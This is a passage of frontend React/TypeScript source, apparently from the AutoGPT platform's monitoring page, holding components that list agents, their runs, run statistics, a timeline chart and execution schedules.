const selectedFlowVersion: Graph | undefined = flowVersions?.find(
(v) =>
v.version ==
(selectedVersion == "all" ? flow.graph_version : selectedVersion),
);
const hasInputs = Object.keys(flow.input_schema.properties).length > 0;
const hasCredentialsInputs =
Object.keys(flow.credentials_input_schema.properties).length > 0;
const [isDeleteModalOpen, setIsDeleteModalOpen] = useState(false);
const [isRunDialogOpen, setIsRunDialogOpen] = useState(false);
const isDisabled = !selectedFlowVersion;
useEffect(() => {
api
.getGraphAllVersions(flow.graph_id)
.then((result) => setFlowVersions(result));
}, [flow.graph_id, api]);
const openRunDialog = () => setIsRunDialogOpen(true);
const runOrOpenInput = () => {
if (hasInputs || hasCredentialsInputs) {
openRunDialog();
} else {
saveAndRun({}, {});
}
};
return (
<Card {...props}>
<CardHeader className="">
<CardTitle>
{flow.name} <span className="font-light">v{flow.graph_version}</span>
</CardTitle>
<div className="flex flex-col space-y-2 py-6">
{(flowVersions?.length ?? 0) > 1 && (
<DropdownMenu>
<DropdownMenuTrigger asChild>
<Button variant="outline">
<ClockIcon className="mr-2" />
{selectedVersion == "all"
? "All versions"
: `Version ${selectedVersion}`}
</Button>
</DropdownMenuTrigger>
<DropdownMenuContent className="w-56">
<DropdownMenuLabel>Choose a version</DropdownMenuLabel>
<DropdownMenuSeparator />
<DropdownMenuRadioGroup
value={String(selectedVersion)}
onValueChange={(choice: string) =>
setSelectedFlowVersion(
choice == "all" ? choice : Number(choice),
)
}
>
<DropdownMenuRadioItem value="all">
All versions
</DropdownMenuRadioItem>
{flowVersions?.map((v) => (
<DropdownMenuRadioItem
key={v.version}
value={v.version.toString()}
>
Version {v.version}
{v.is_active ? " (active)" : ""}
</DropdownMenuRadioItem>
))}
</DropdownMenuRadioGroup>
</DropdownMenuContent>
</DropdownMenu>
)}
{flow.can_access_graph && (
<Link
className={buttonVariants({ variant: "default" })}
href={`/build?flowID=${flow.graph_id}&flowVersion=${flow.graph_version}`}
>
<Pencil2Icon className="mr-2" />
Open in Builder
</Link>
)}
{flow.can_access_graph && (
<Button
variant="outline"
className="px-2.5"
title="Export to a JSON-file"
data-testid="export-button"
onClick={() =>
api
.getGraph(flow.graph_id, selectedFlowVersion!.version, true)
.then((graph) =>
exportAsJSONFile(
graph,
`${flow.name}_v${selectedFlowVersion!.version}.json`,
),
)
}
>
<ExitIcon className="mr-2" /> Export
</Button>
)}
<Button
variant="secondary"
className="bg-purple-500 text-white hover:bg-purple-700"
onClick={!isRunning ? runOrOpenInput : stopRun}
disabled={isDisabled}
title={!isRunning ? "Run Agent" : "Stop Agent"}
>
<PlayIcon className="mr-2" />
{isRunning ? "Stop Agent" : "Run Agent"}
</Button>
{flow.can_access_graph && (
<Button
variant="destructive"
onClick={() => setIsDeleteModalOpen(true)}
data-testid="delete-button"
>
<TrashIcon className="mr-2" />
Delete Agent
</Button>
)}
</div>
</CardHeader>
<CardContent>
<FlowRunsStatus
flows={[flow]}
executions={executions.filter(
(execution) =>
execution.graph_id == flow.graph_id &&
(selectedVersion == "all" ||
execution.graph_version == selectedVersion),
)}
/>
</CardContent>
<Dialog open={isDeleteModalOpen} onOpenChange={setIsDeleteModalOpen}>
<DialogContent>
<DialogHeader>
<DialogTitle>Delete Agent</DialogTitle>
<DialogDescription>
Are you sure you want to delete this agent? <br />
This action cannot be undone.
</DialogDescription>
</DialogHeader>
<DialogFooter>
<Button
variant="outline"
onClick={() => setIsDeleteModalOpen(false)}
>
Cancel
</Button>
<Button
variant="destructive"
onClick={() => {
api.deleteLibraryAgent(flow.id).then(() => {
setIsDeleteModalOpen(false);
refresh();
});
}}
>
Delete
</Button>
</DialogFooter>
</DialogContent>
</Dialog>
{savedAgent && (
<RunnerInputDialog
isOpen={isRunDialogOpen}
doClose={() => setIsRunDialogOpen(false)}
graph={savedAgent}
doRun={saveAndRun}
/>
)}
</Card>
);
};
export default FlowInfo;

View File

@@ -0,0 +1,142 @@
import React, { useCallback, useEffect, useState } from "react";
import { GraphExecutionMeta, LibraryAgent } from "@/lib/autogpt-server-api";
import {
Card,
CardContent,
CardHeader,
CardTitle,
} from "@/components/__legacy__/ui/card";
import Link from "next/link";
import { Button, buttonVariants } from "@/components/__legacy__/ui/button";
import { IconSquare } from "@/components/__legacy__/ui/icons";
import { ExitIcon, Pencil2Icon } from "@radix-ui/react-icons";
import { format } from "date-fns";
import { FlowRunStatusBadge } from "@/app/(platform)/monitoring/components/FlowRunStatusBadge";
import { useBackendAPI } from "@/lib/autogpt-server-api/context";
import RunnerOutputUI, {
OutputNodeInfo,
} from "../../build/components/legacy-builder/RunnerOutputUI";
export const FlowRunInfo: React.FC<
React.HTMLAttributes<HTMLDivElement> & {
agent: LibraryAgent;
execution: GraphExecutionMeta;
}
> = ({ agent, execution, ...props }) => {
const [isOutputOpen, setIsOutputOpen] = useState(false);
const [blockOutputs, setBlockOutputs] = useState<OutputNodeInfo[]>([]);
const api = useBackendAPI();
const fetchBlockResults = useCallback(async () => {
const graph = await api.getGraph(agent.graph_id, agent.graph_version);
const graphExecution = await api.getGraphExecutionInfo(
agent.graph_id,
execution.id,
);
// Transform results to BlockOutput format
setBlockOutputs(
Object.entries(graphExecution.outputs).flatMap(([key, values]) =>
values.map(
(value) =>
({
metadata: {
name: graph.output_schema.properties[key].title || "Output",
description:
graph.output_schema.properties[key].description ||
"Output from the agent",
},
result: value,
}) satisfies OutputNodeInfo,
),
),
);
}, [api, agent.graph_id, agent.graph_version, execution.id]);
// Fetch graph and execution data
useEffect(() => {
if (!isOutputOpen) return;
fetchBlockResults();
}, [isOutputOpen, fetchBlockResults]);
if (execution.graph_id != agent.graph_id) {
throw new Error(
`FlowRunInfo can't be used with non-matching execution.graph_id and flow.id`,
);
}
const handleStopRun = useCallback(() => {
api.stopGraphExecution(agent.graph_id, execution.id);
}, [api, agent.graph_id, execution.id]);
return (
<>
<Card {...props}>
<CardHeader className="flex-row items-center justify-between space-x-3 space-y-0">
<div>
<CardTitle>
{agent.name}{" "}
<span className="font-light">v{execution.graph_version}</span>
</CardTitle>
</div>
<div className="flex space-x-2">
{execution.status === "RUNNING" && (
<Button onClick={handleStopRun} variant="destructive">
<IconSquare className="mr-2" /> Stop Run
</Button>
)}
<Button onClick={() => setIsOutputOpen(true)} variant="outline">
<ExitIcon className="mr-2" /> View Outputs
</Button>
{agent.can_access_graph && (
<Link
className={buttonVariants({ variant: "default" })}
href={`/build?flowID=${execution.graph_id}&flowVersion=${execution.graph_version}&flowExecutionID=${execution.id}`}
>
<Pencil2Icon className="mr-2" /> Open in Builder
</Link>
)}
</div>
</CardHeader>
<CardContent>
<p className="hidden">
<strong>Agent ID:</strong> <code>{agent.graph_id}</code>
</p>
<p className="hidden">
<strong>Run ID:</strong> <code>{execution.id}</code>
</p>
<div>
<strong>Status:</strong>{" "}
<FlowRunStatusBadge status={execution.status} />
</div>
<p>
<strong>Started:</strong>{" "}
{execution.started_at
? format(execution.started_at, "yyyy-MM-dd HH:mm:ss")
: "—"}
</p>
<p>
<strong>Finished:</strong>{" "}
{execution.ended_at
? format(execution.ended_at, "yyyy-MM-dd HH:mm:ss")
: "—"}
</p>
{execution.stats && (
<p>
<strong>Duration (run time):</strong>{" "}
{execution.stats.duration.toFixed(1)} (
{execution.stats.node_exec_time.toFixed(1)}) seconds
</p>
)}
</CardContent>
</Card>
<RunnerOutputUI
isOpen={isOutputOpen}
doClose={() => setIsOutputOpen(false)}
outputs={blockOutputs}
/>
</>
);
};
export default FlowRunInfo;

View File

@@ -0,0 +1,25 @@
import React from "react";
import { Badge } from "@/components/__legacy__/ui/badge";
import { cn } from "@/lib/utils";
import { GraphExecutionMeta } from "@/lib/autogpt-server-api";
export const FlowRunStatusBadge: React.FC<{
status: GraphExecutionMeta["status"];
className?: string;
}> = ({ status, className }) => (
<Badge
variant="default"
className={cn(
status === "RUNNING"
? "bg-blue-500 dark:bg-blue-700"
: status === "QUEUED"
? "bg-yellow-500 dark:bg-yellow-600"
: status === "COMPLETED"
? "bg-green-500 dark:bg-green-600"
: "bg-red-500 dark:bg-red-700",
className,
)}
>
{status}
</Badge>
);

View File

@@ -0,0 +1,92 @@
import React from "react";
import { GraphExecutionMeta, LibraryAgent } from "@/lib/autogpt-server-api";
import {
Card,
CardContent,
CardHeader,
CardTitle,
} from "@/components/__legacy__/ui/card";
import {
Table,
TableBody,
TableCell,
TableHead,
TableHeader,
TableRow,
} from "@/components/__legacy__/ui/table";
import { format } from "date-fns";
import { FlowRunStatusBadge } from "@/app/(platform)/monitoring/components/FlowRunStatusBadge";
import { TextRenderer } from "../../../../components/__legacy__/ui/render";
export const FlowRunsList: React.FC<{
flows: LibraryAgent[];
executions: GraphExecutionMeta[];
className?: string;
selectedRun?: GraphExecutionMeta | null;
onSelectRun: (r: GraphExecutionMeta) => void;
}> = ({ flows, executions, selectedRun, onSelectRun, className }) => (
<Card className={className}>
<CardHeader>
<CardTitle>Runs</CardTitle>
</CardHeader>
<CardContent>
<Table>
<TableHeader>
<TableRow>
<TableHead>Agent</TableHead>
<TableHead>Started</TableHead>
<TableHead>Status</TableHead>
<TableHead>Duration</TableHead>
</TableRow>
</TableHeader>
<TableBody data-testid="flow-runs-list-body">
{executions.map((execution) => (
<TableRow
key={execution.id}
data-testid={`flow-run-${execution.id}-graph-${execution.graph_id}`}
data-runid={execution.id}
data-graphid={execution.graph_id}
className="cursor-pointer"
onClick={() => onSelectRun(execution)}
data-state={selectedRun?.id == execution.id ? "selected" : null}
>
<TableCell>
<TextRenderer
value={
flows.find((f) => f.graph_id == execution.graph_id)?.name
}
truncateLengthLimit={30}
/>
</TableCell>
<TableCell>
{execution.started_at
? format(execution.started_at, "HH:mm")
: "—"}
</TableCell>
<TableCell>
<FlowRunStatusBadge
status={execution.status}
className="w-full justify-center"
/>
</TableCell>
<TableCell>
{execution.stats
? formatDuration(execution.stats.duration)
: ""}
</TableCell>
</TableRow>
))}
</TableBody>
</Table>
</CardContent>
</Card>
);
function formatDuration(seconds: number): string {
return (
(seconds < 100 ? seconds.toPrecision(2) : Math.round(seconds)).toString() +
"s"
);
}
export default FlowRunsList;

View File

@@ -0,0 +1,131 @@
import React, { useState } from "react";
import { GraphExecutionMeta, LibraryAgent } from "@/lib/autogpt-server-api";
import { CardTitle } from "@/components/__legacy__/ui/card";
import { Button } from "@/components/__legacy__/ui/button";
import {
Popover,
PopoverContent,
PopoverTrigger,
} from "@/components/__legacy__/ui/popover";
import { Calendar } from "@/components/__legacy__/ui/calendar";
import { FlowRunsTimeline } from "@/app/(platform)/monitoring/components/FlowRunsTimeline";
export const FlowRunsStatus: React.FC<{
flows: LibraryAgent[];
executions: GraphExecutionMeta[];
title?: string;
className?: string;
}> = ({ flows, executions: executions, title, className }) => {
/* "dateMin": since the first flow in the dataset
* number > 0: custom date (unix timestamp)
* number < 0: offset relative to Date.now() (in seconds) */
const [selected, setSelected] = useState<Date>();
const [statsSince, setStatsSince] = useState<number | "dataMin">(-24 * 3600);
const statsSinceTimestamp = // unix timestamp or null
typeof statsSince == "string"
? null
: statsSince < 0
? Date.now() + statsSince * 1000
: statsSince;
const filteredFlowRuns =
statsSinceTimestamp != null
? executions.filter(
(fr) =>
fr.started_at && fr.started_at.getTime() > statsSinceTimestamp,
)
: executions;
return (
<div className={className}>
<div className="flex flex-row items-center justify-between">
<CardTitle>{title || "Stats"}</CardTitle>
<div className="flex flex-wrap space-x-2">
<Button
variant="outline"
size="sm"
onClick={() => setStatsSince(-2 * 3600)}
>
2h
</Button>
<Button
variant="outline"
size="sm"
onClick={() => setStatsSince(-8 * 3600)}
>
8h
</Button>
<Button
variant="outline"
size="sm"
onClick={() => setStatsSince(-24 * 3600)}
>
24h
</Button>
<Button
variant="outline"
size="sm"
onClick={() => setStatsSince(-7 * 24 * 3600)}
>
7d
</Button>
<Popover>
<PopoverTrigger asChild>
<Button variant={"outline"} size="sm">
Custom
</Button>
</PopoverTrigger>
<PopoverContent className="w-auto p-0" align="start">
<Calendar
mode="single"
selected={selected}
onSelect={(_, selectedDay) => {
setSelected(selectedDay);
setStatsSince(selectedDay.getTime());
}}
/>
</PopoverContent>
</Popover>
<Button
variant="outline"
size="sm"
onClick={() => setStatsSince("dataMin")}
>
All
</Button>
</div>
</div>
<FlowRunsTimeline
flows={flows}
executions={executions}
dataMin={statsSince}
className="mt-3"
/>
<hr className="my-4" />
<div>
<p>
<strong>Total runs:</strong> {filteredFlowRuns.length}
</p>
<p>
<strong>Total run time:</strong>{" "}
{filteredFlowRuns.reduce(
(total, run) => total + (run.stats?.node_exec_time ?? 0),
0,
)}{" "}
seconds
</p>
{filteredFlowRuns.some((r) => r.stats) && (
<p>
<strong>Total cost:</strong> $
{(
filteredFlowRuns.reduce(
(total, run) => total + (run.stats?.cost ?? 0),
0,
) / 100
).toFixed(2)}
</p>
)}
</div>
</div>
);
};
export default FlowRunsStatus;

View File

@@ -0,0 +1,189 @@
import { GraphExecutionMeta, LibraryAgent } from "@/lib/autogpt-server-api";
import {
ComposedChart,
DefaultLegendContentProps,
Legend,
Line,
ResponsiveContainer,
Scatter,
Tooltip,
XAxis,
YAxis,
} from "recharts";
import { differenceInHours, format } from "date-fns";
import { Card } from "@/components/__legacy__/ui/card";
import { cn, hashString } from "@/lib/utils";
import React from "react";
import { FlowRunStatusBadge } from "@/app/(platform)/monitoring/components/FlowRunStatusBadge";
export const FlowRunsTimeline = ({
flows,
executions,
dataMin,
className,
}: {
flows: LibraryAgent[];
executions: GraphExecutionMeta[];
dataMin: "dataMin" | number;
className?: string;
}) => (
/* TODO: make logarithmic? */
<ResponsiveContainer width="100%" height={120} className={className}>
<ComposedChart>
<XAxis
dataKey="time"
type="number"
domain={[
typeof dataMin == "string"
? dataMin
: dataMin < 0
? Date.now() + dataMin * 1000
: dataMin,
Date.now(),
]}
allowDataOverflow={true}
tickFormatter={(unixTime) => {
const now = new Date();
const time = new Date(unixTime);
return differenceInHours(now, time) < 24
? format(time, "HH:mm")
: format(time, "yyyy-MM-dd HH:mm");
}}
name="Time"
scale="time"
/>
<YAxis
dataKey="_duration"
name="Duration (s)"
tickFormatter={(s) => (s > 90 ? `${Math.round(s / 60)}m` : `${s}s`)}
/>
<Tooltip
content={({ payload }) => {
if (payload && payload.length) {
const data: GraphExecutionMeta & {
time: number;
_duration: number;
} = payload[0].payload;
const flow = flows.find((f) => f.graph_id === data.graph_id);
return (
<Card className="p-2 text-xs leading-normal">
<p>
<strong>Agent:</strong> {flow ? flow.name : "Unknown"}
</p>
<div>
<strong>Status:</strong>&nbsp;
<FlowRunStatusBadge
status={data.status}
className="px-1.5 py-0"
/>
</div>
<p>
<strong>Started:</strong>{" "}
{data.started_at
? format(data.started_at, "yyyy-MM-dd HH:mm:ss")
: "—"}
</p>
{data.stats && (
<p>
<strong>Duration / run time:</strong>{" "}
{formatDuration(data.stats.duration)} /{" "}
{formatDuration(data.stats.node_exec_time)}
</p>
)}
</Card>
);
}
return null;
}}
/>
{flows.map((flow) => (
<Scatter
key={flow.id}
data={executions
.filter((e) => e.graph_id == flow.graph_id && e.started_at)
.map((e) => ({
...e,
time:
(e.started_at?.getTime() ?? 0) +
(e.stats?.node_exec_time ?? 0) * 1000,
_duration: e.stats?.node_exec_time ?? 0,
}))}
name={flow.name}
fill={`hsl(${(hashString(flow.id) * 137.5) % 360}, 70%, 50%)`}
/>
))}
{executions
.filter((e) => e.started_at && e.ended_at)
.map((execution) => (
<Line
key={execution.id}
type="linear"
dataKey="_duration"
data={[
{
...execution,
time: execution.started_at!.getTime(),
_duration: 0,
},
{
...execution,
time: execution.ended_at!.getTime(),
_duration: execution.stats?.node_exec_time ?? 0,
},
]}
stroke={`hsl(${(hashString(execution.graph_id) * 137.5) % 360}, 70%, 50%)`}
strokeWidth={2}
dot={false}
legendType="none"
/>
))}
<Legend
content={<ScrollableLegend />}
wrapperStyle={{
bottom: 0,
left: 0,
right: 0,
width: "100%",
display: "flex",
justifyContent: "center",
}}
/>
</ComposedChart>
</ResponsiveContainer>
);
export default FlowRunsTimeline;
const ScrollableLegend: React.FC<
DefaultLegendContentProps & { className?: string }
> = ({ payload, className }) => {
return (
<div
className={cn(
"space-x-3 overflow-x-auto whitespace-nowrap px-4 text-sm",
className,
)}
style={{ scrollbarWidth: "none" }}
>
{payload?.map((entry, index) => {
if (entry.type == "none") return;
return (
<span key={`item-${index}`} className="inline-flex items-center">
<span
className="mr-1 inline-block size-2.5 rounded-full"
style={{ backgroundColor: entry.color }}
/>
<span>{entry.value}</span>
</span>
);
})}
</div>
);
};
function formatDuration(seconds: number): string {
return (
(seconds < 100 ? seconds.toPrecision(2) : Math.round(seconds)).toString() +
"s"
);
}

View File

@@ -0,0 +1,285 @@
import { LibraryAgent } from "@/lib/autogpt-server-api";
import { GraphExecutionJobInfo } from "@/app/api/__generated__/models/graphExecutionJobInfo";
import { Button } from "@/components/__legacy__/ui/button";
import { Card } from "@/components/__legacy__/ui/card";
import {
Table,
TableBody,
TableCell,
TableHead,
TableHeader,
TableRow,
} from "@/components/__legacy__/ui/table";
import { Badge } from "@/components/__legacy__/ui/badge";
import { ScrollArea } from "@/components/__legacy__/ui/scroll-area";
import { ClockIcon, Loader2 } from "lucide-react";
import { useToast } from "@/components/molecules/Toast/use-toast";
import { humanizeCronExpression } from "@/lib/cron-expression-utils";
import { useUserTimezone } from "@/lib/hooks/useUserTimezone";
import {
formatScheduleTime,
getTimezoneAbbreviation,
} from "@/lib/timezone-utils";
import {
Select,
SelectContent,
SelectItem,
SelectTrigger,
SelectValue,
} from "@/components/__legacy__/ui/select";
import { useRouter } from "next/navigation";
import { useState } from "react";
import {
Dialog,
DialogContent,
DialogHeader,
DialogTitle,
} from "@/components/__legacy__/ui/dialog";
import { TextRenderer } from "../../../../components/__legacy__/ui/render";
import { Input } from "../../../../components/__legacy__/ui/input";
import { Label } from "../../../../components/__legacy__/ui/label";
interface SchedulesTableProps {
schedules: GraphExecutionJobInfo[];
agents: LibraryAgent[];
onRemoveSchedule: (scheduleId: string, enabled: boolean) => void;
sortColumn: keyof GraphExecutionJobInfo;
sortDirection: "asc" | "desc";
onSort: (column: keyof GraphExecutionJobInfo) => void;
}
export const SchedulesTable = ({
schedules,
agents,
onRemoveSchedule,
sortColumn,
sortDirection,
onSort,
}: SchedulesTableProps) => {
const { toast } = useToast();
const router = useRouter();
const [selectedAgent, setSelectedAgent] = useState<string>(""); // Library Agent ID
const [selectedVersion, setSelectedVersion] = useState<number>(0); // Graph version
const [maxVersion, setMaxVersion] = useState<number>(0);
const [isDialogOpen, setIsDialogOpen] = useState(false);
const [isLoading, setIsLoading] = useState(false);
const [selectedFilter, setSelectedFilter] = useState<string>(""); // Graph ID
// Get user's timezone for displaying schedule times
const userTimezone = useUserTimezone() ?? "UTC";
const filteredAndSortedSchedules = [...schedules]
.filter(
(schedule) => !selectedFilter || schedule.graph_id === selectedFilter,
)
.sort((a, b) => {
const aValue = a[sortColumn];
const bValue = b[sortColumn];
if (sortDirection === "asc") {
return String(aValue).localeCompare(String(bValue));
}
return String(bValue).localeCompare(String(aValue));
});
const handleToggleSchedule = (scheduleId: string, enabled: boolean) => {
onRemoveSchedule(scheduleId, enabled);
if (!enabled) {
toast({
title: "Schedule Disabled",
description: "The schedule has been successfully disabled.",
});
}
};
const handleNewSchedule = () => {
setIsDialogOpen(true);
};
const handleAgentSelect = (agentId: string) => {
setSelectedAgent(agentId);
const agent = agents.find((a) => a.id === agentId);
setMaxVersion(agent!.graph_version);
setSelectedVersion(agent!.graph_version);
};
const handleVersionSelect = (version: string) => {
setSelectedVersion(parseInt(version));
};
const handleSchedule = async () => {
if (!selectedAgent || !selectedVersion) {
toast({
title: "Invalid Input",
description: "Please select an agent and a version.",
variant: "destructive",
});
return;
}
if (selectedVersion < 1 || selectedVersion > maxVersion) {
toast({
title: "Invalid Version",
description: `Please select a version between 1 and ${maxVersion}.`,
variant: "destructive",
});
return;
}
setIsLoading(true);
const agent = agents.find((a) => a.id == selectedAgent)!;
try {
await new Promise((resolve) => setTimeout(resolve, 100));
router.push(
`/build?flowID=${agent.graph_id}&flowVersion=${agent.graph_version}&open_scheduling=true`,
);
} catch (error) {
console.error("Navigation error:", error);
}
};
return (
<Card className="h-fit p-4">
<Dialog open={isDialogOpen} onOpenChange={setIsDialogOpen}>
<DialogContent>
<DialogHeader>
<DialogTitle>Select Agent for New Schedule</DialogTitle>
</DialogHeader>
<Select onValueChange={handleAgentSelect}>
<SelectTrigger className="w-full">
<SelectValue placeholder="Select an agent" />
</SelectTrigger>
<SelectContent>
{agents.map((agent, i) => (
<SelectItem key={agent.id + i} value={agent.id}>
<TextRenderer value={agent.name} truncateLengthLimit={30} />
</SelectItem>
))}
</SelectContent>
</Select>
<Label className="mt-4">
Select version between 1 and {maxVersion}
</Label>
<Input
type="number"
min={1}
max={selectedAgent ? maxVersion : 0}
value={selectedVersion}
onChange={(e) => handleVersionSelect(e.target.value)}
placeholder="Select version"
className="w-full"
/>
<Button
onClick={handleSchedule}
disabled={isLoading || !selectedAgent}
className="mt-4"
>
{isLoading ? (
<>
<Loader2 className="mr-2 h-4 w-4 animate-spin" />
Loading...
</>
) : (
"Schedule"
)}
</Button>
</DialogContent>
</Dialog>
<div className="mb-4 flex items-center justify-between">
<h3 className="text-lg font-semibold">Schedules</h3>
<div className="flex flex-wrap gap-2">
<Select onValueChange={setSelectedFilter}>
<SelectTrigger className="h-8 w-[180px] rounded-md px-3 text-xs">
<SelectValue placeholder="Filter by graph" />
</SelectTrigger>
<SelectContent className="text-xs">
{agents.map((agent) => (
<SelectItem key={agent.id} value={agent.graph_id}>
{agent.name}
</SelectItem>
))}
</SelectContent>
</Select>
<Button size="sm" variant="outline" onClick={handleNewSchedule}>
<ClockIcon className="mr-2 h-4 w-4" />
New Schedule
</Button>
</div>
</div>
<ScrollArea className="max-h-[400px]">
<Table>
<TableHeader>
<TableRow>
<TableHead
onClick={() => onSort("graph_id")}
className="cursor-pointer"
>
Graph Name
</TableHead>
<TableHead className="cursor-pointer">Graph Version</TableHead>
<TableHead
onClick={() => onSort("next_run_time")}
className="cursor-pointer"
>
Next Execution
</TableHead>
<TableHead
onClick={() => onSort("cron")}
className="cursor-pointer"
>
Schedule
</TableHead>
<TableHead>Timezone</TableHead>
<TableHead>Actions</TableHead>
</TableRow>
</TableHeader>
<TableBody>
{filteredAndSortedSchedules.length === 0 ? (
<TableRow>
<TableCell
colSpan={6}
className="py-8 text-center text-lg text-gray-400"
>
No schedules are available
</TableCell>
</TableRow>
) : (
filteredAndSortedSchedules.map((schedule) => (
<TableRow key={schedule.id}>
<TableCell className="font-medium">
{agents.find((a) => a.graph_id === schedule.graph_id)
?.name || schedule.graph_id}
</TableCell>
<TableCell>{schedule.graph_version}</TableCell>
<TableCell>
{formatScheduleTime(schedule.next_run_time, userTimezone)}
</TableCell>
<TableCell>
<Badge variant="secondary">
{humanizeCronExpression(schedule.cron)}
</Badge>
</TableCell>
<TableCell>
<span className="text-sm text-muted-foreground">
{schedule.timezone
? getTimezoneAbbreviation(schedule.timezone)
: userTimezone && getTimezoneAbbreviation(userTimezone)}
</span>
</TableCell>
<TableCell>
<div className="flex space-x-2">
<Button
variant={"destructive"}
onClick={() => handleToggleSchedule(schedule.id, false)}
>
Remove
</Button>
</div>
</TableCell>
</TableRow>
))
)}
</TableBody>
</Table>
</ScrollArea>
</Card>
);
};

View File

@@ -0,0 +1,24 @@
export default function AgentsFlowListSkeleton() {
return (
<div className="mx-auto max-w-4xl p-4">
<div className="mb-4 flex items-center justify-between">
<h1 className="text-2xl font-bold">Agents</h1>
<div className="h-10 w-24 animate-pulse rounded bg-gray-200"></div>
</div>
<div className="rounded-lg bg-white p-4 shadow">
<div className="mb-4 grid grid-cols-3 gap-4 font-medium text-gray-500">
<div>Name</div>
<div># of runs</div>
<div>Last run</div>
</div>
{[...Array(3)].map((_, index) => (
<div key={index} className="mb-4 grid grid-cols-3 gap-4">
<div className="h-6 animate-pulse rounded bg-gray-200"></div>
<div className="h-6 animate-pulse rounded bg-gray-200"></div>
<div className="h-6 animate-pulse rounded bg-gray-200"></div>
</div>
))}
</div>
</div>
);
}

View File

@@ -0,0 +1,23 @@
export default function FlowRunsListSkeleton() {
return (
<div className="mx-auto max-w-4xl p-4">
<div className="rounded-lg bg-white p-4 shadow">
<h2 className="mb-4 text-xl font-semibold">Runs</h2>
<div className="mb-4 grid grid-cols-4 gap-4 text-sm font-medium text-gray-500">
<div>Agent</div>
<div>Started</div>
<div>Status</div>
<div>Duration</div>
</div>
{[...Array(4)].map((_, index) => (
<div key={index} className="mb-4 grid grid-cols-4 gap-4">
<div className="h-5 animate-pulse rounded bg-gray-200"></div>
<div className="h-5 animate-pulse rounded bg-gray-200"></div>
<div className="h-5 animate-pulse rounded bg-gray-200"></div>
<div className="h-5 animate-pulse rounded bg-gray-200"></div>
</div>
))}
</div>
</div>
);
}

View File

@@ -0,0 +1,28 @@
export default function FlowRunsStatusSkeleton() {
return (
<div className="mx-auto max-w-4xl p-4">
<div className="rounded-lg bg-white p-4 shadow">
<div className="mb-6 flex items-center justify-between">
<h2 className="text-xl font-semibold">Stats</h2>
<div className="flex space-x-2">
{["2h", "8h", "24h", "7d", "Custom", "All"].map((btn) => (
<div
key={btn}
className="h-8 w-16 animate-pulse rounded bg-gray-200"
></div>
))}
</div>
</div>
{/* Placeholder for the line chart */}
<div className="mb-6 h-64 w-full animate-pulse rounded bg-gray-200"></div>
{/* Placeholders for total runs and total run time */}
<div className="space-y-2">
<div className="h-6 w-1/3 animate-pulse rounded bg-gray-200"></div>
<div className="h-6 w-1/2 animate-pulse rounded bg-gray-200"></div>
</div>
</div>
</div>
);
}

View File

@@ -0,0 +1,21 @@
import AgentFlowListSkeleton from "@/app/(platform)/monitoring/components/skeletons/AgentFlowListSkeleton";
import React from "react";
import FlowRunsListSkeleton from "@/app/(platform)/monitoring/components/skeletons/FlowRunsListSkeleton";
import FlowRunsStatusSkeleton from "@/app/(platform)/monitoring/components/skeletons/FlowRunsStatusSkeleton";
export default function MonitorLoadingSkeleton() {
return (
<div className="space-y-4 p-4">
<div className="grid grid-cols-1 gap-4 md:grid-cols-3">
{/* Agents Section */}
<AgentFlowListSkeleton />
{/* Runs Section */}
<FlowRunsListSkeleton />
{/* Stats Section */}
<FlowRunsStatusSkeleton />
</div>
</div>
);
}

View File

@@ -0,0 +1,151 @@
"use client";
import React, { useCallback, useEffect, useState } from "react";
import { GraphExecutionMeta, LibraryAgent } from "@/lib/autogpt-server-api";
import { GraphExecutionJobInfo } from "@/app/api/__generated__/models/graphExecutionJobInfo";
import {
useGetV1ListExecutionSchedulesForAUser,
useDeleteV1DeleteExecutionSchedule,
} from "@/app/api/__generated__/endpoints/schedules/schedules";
import { okData } from "@/app/api/helpers";
import { Card } from "@/components/__legacy__/ui/card";
import { SchedulesTable } from "@/app/(platform)/monitoring/components/SchedulesTable";
import { useBackendAPI } from "@/lib/autogpt-server-api/context";
import AgentFlowList from "./components/AgentFlowList";
import FlowRunsList from "./components/FlowRunsList";
import FlowRunInfo from "./components/FlowRunInfo";
import FlowInfo from "./components/FlowInfo";
import FlowRunsStatus from "./components/FlowRunsStatus";
const Monitor = () => {
const [flows, setFlows] = useState<LibraryAgent[]>([]);
const [executions, setExecutions] = useState<GraphExecutionMeta[]>([]);
const [selectedFlow, setSelectedFlow] = useState<LibraryAgent | null>(null);
const [selectedRun, setSelectedRun] = useState<GraphExecutionMeta | null>(
null,
);
const [sortColumn, setSortColumn] =
useState<keyof GraphExecutionJobInfo>("id");
const [sortDirection, setSortDirection] = useState<"asc" | "desc">("asc");
const api = useBackendAPI();
// Use generated API hooks for schedules
const { data: schedulesResponse, refetch: refetchSchedules } =
useGetV1ListExecutionSchedulesForAUser();
const deleteScheduleMutation = useDeleteV1DeleteExecutionSchedule();
const schedules = okData(schedulesResponse) ?? [];
const removeSchedule = useCallback(
async (scheduleId: string) => {
await deleteScheduleMutation.mutateAsync({ scheduleId });
refetchSchedules();
},
[deleteScheduleMutation, refetchSchedules],
);
const fetchAgents = useCallback(() => {
api.listLibraryAgents().then((response) => {
setFlows(response.agents);
});
api.getExecutions().then((executions) => {
setExecutions(executions);
});
}, [api]);
useEffect(() => {
fetchAgents();
}, [fetchAgents]);
useEffect(() => {
const intervalId = setInterval(() => fetchAgents(), 5000);
return () => clearInterval(intervalId);
}, [fetchAgents, flows]);
const column1 = "md:col-span-2 xl:col-span-3 xxl:col-span-2";
const column2 = "md:col-span-3 lg:col-span-2 xl:col-span-3";
const column3 = "col-span-full xl:col-span-4 xxl:col-span-5";
const handleSort = (column: keyof GraphExecutionJobInfo) => {
if (sortColumn === column) {
setSortDirection(sortDirection === "asc" ? "desc" : "asc");
} else {
setSortColumn(column);
setSortDirection("asc");
}
};
return (
<div
className="grid grid-cols-1 gap-4 p-4 md:grid-cols-5 lg:grid-cols-4 xl:grid-cols-10"
data-testid="monitor-page"
>
<AgentFlowList
className={column1}
flows={flows}
executions={executions}
selectedFlow={selectedFlow}
onSelectFlow={(f) => {
setSelectedRun(null);
setSelectedFlow(f.id == selectedFlow?.id ? null : f);
}}
/>
<FlowRunsList
className={column2}
flows={flows}
executions={[
...(selectedFlow
? executions.filter((v) => v.graph_id == selectedFlow.graph_id)
: executions),
].sort((a, b) => {
const aTime = a.started_at?.getTime() ?? 0;
const bTime = b.started_at?.getTime() ?? 0;
return bTime - aTime;
})}
selectedRun={selectedRun}
onSelectRun={(r) => setSelectedRun(r.id == selectedRun?.id ? null : r)}
/>
{(selectedRun && (
<FlowRunInfo
agent={
selectedFlow ||
flows.find((f) => f.graph_id == selectedRun.graph_id)!
}
execution={selectedRun}
className={column3}
/>
)) ||
